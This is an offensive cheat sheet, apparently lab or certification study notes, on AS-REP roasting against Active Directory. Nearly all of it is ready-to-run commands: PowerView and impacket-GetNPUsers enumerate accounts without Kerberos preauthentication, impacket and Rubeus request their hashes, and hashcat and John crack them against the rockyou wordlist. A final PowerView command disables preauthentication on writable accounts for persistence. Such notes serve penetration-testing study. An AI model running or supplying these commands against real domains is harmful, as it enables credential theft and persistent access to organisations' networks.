- AS-REP, or Kerberos preauthentication, prevents offline password guessing and attacks against the server responses.
- However, if "Do not require Kerberos preauthentication" is enabled for specific users for applications to function properly this can be done.
- In some situations it may be possible to enable it manually also.
Enumerate Kerberos preauth disabled:
Get-NetUser -PreauthNotRequired -Verbose | select cn
impacket-GetNPUsers -dc-ip 192.168.50.70 corp.com/pete
Remote AS-REP Roasting with Impacket:
- Uses ip address for domain controller and user to authenticate
- Launch roast:
impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete
- Crack hash:
#Hashcat:
sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
#John:
john --wordlist=passwords_kerb.txt hashes.asreproast
Local AS-REP Roasting with Rubeus:
- Launch roast:
.\Rubeus.exe asreproast /nowrap
- Crack hash on kali:
sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
Targeted AS-REP Roasting Abuse/Persistence:
- Set preauth not required for users where we have write privileges:
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose